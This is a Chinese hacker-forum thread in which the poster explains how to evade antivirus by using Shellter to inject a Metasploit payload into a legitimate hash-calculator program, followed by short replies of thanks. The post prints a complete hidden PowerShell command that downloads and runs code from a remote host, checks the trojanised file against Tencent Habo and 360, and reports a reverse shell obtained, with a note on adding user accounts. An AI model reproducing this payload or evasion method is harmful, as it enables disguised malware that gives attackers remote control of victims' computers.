设为首页收藏本站
查看: 262|回复: 6

Metasploit免杀,过墙

[复制链接]
  • TA的每日心情
    奋斗
    13 小时前
  • 签到天数: 245 天

    [LV.8]以坛为家I

    发表于 5 天前 | 显示全部楼层 |阅读模式
    Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。-百度百科

    上面可以完成很多骚操作,但是由于太有名,一般的编码方式怎么编还是过不去防火墙。

    今天来谈谈一种特别的免杀方法,代码注入

    工具
    kali
    window7
    Metasploit
    Shellter
    腾讯哈勃文件分析

    Shellter是一个动态的shellcode注入工具。动态意味着Shellter能感染我想要感染的文件,并且它还为我提供了不同的选感染文件的方式。

    操作详情



    我用的是一个哈希值计算软件作为示范



    最后这个是我们需要用的恶意代码
    powershell.exe -nop -w hidden -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]:efaultCredentials;IEX $K.downloadstring('http://192.168.23.128:8080/yB2QVdxlQJbs9T');

    现在使用shellter注入恶意代码





    现在输入我们刚刚生成的恶意代码



    然后成功注入



    现在可以关闭软件了。

    现在把文件上传到腾讯哈勃分析

    结果如下



    360查杀结果如下



    运行程序



    反弹了一个会话,现在打开shell



    成功打开了shell

    ps:打开软件时360会有提示,我还不知道怎么去除。。。

    好像只要是有特殊命令执行360都会有提示,就算是你自己输入的,比如自己添加用户 net user 用户名 密码 /add

    不过也算是免杀了一半



  • TA的每日心情

    9 小时前
  • 签到天数: 76 天

    [LV.6]常住居民II

    发表于 5 天前 | 显示全部楼层
    竟然是沙发?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    13 小时前
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 5 天前 | 显示全部楼层
    学习到了,感谢
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    昨天 00:12
  • 签到天数: 10 天

    [LV.3]偶尔看看II

    发表于 5 天前 | 显示全部楼层
    谢谢楼主分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    12 小时前
  • 签到天数: 85 天

    [LV.6]常住居民II

    发表于 4 天前 | 显示全部楼层
    看不懂,没学过
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    4 小时前
  • 签到天数: 105 天

    [LV.6]常住居民II

    发表于 4 天前 | 显示全部楼层
    感谢楼主分享...
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    4 小时前
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 3 天前 | 显示全部楼层
    楼主真厉害,还有就是打开无签名未知程序360提示是很正常的,除非你干掉360,
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /1 下一条

    红盟社区--中国红客联盟 

    Processed in 0.091695 second(s), 19 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表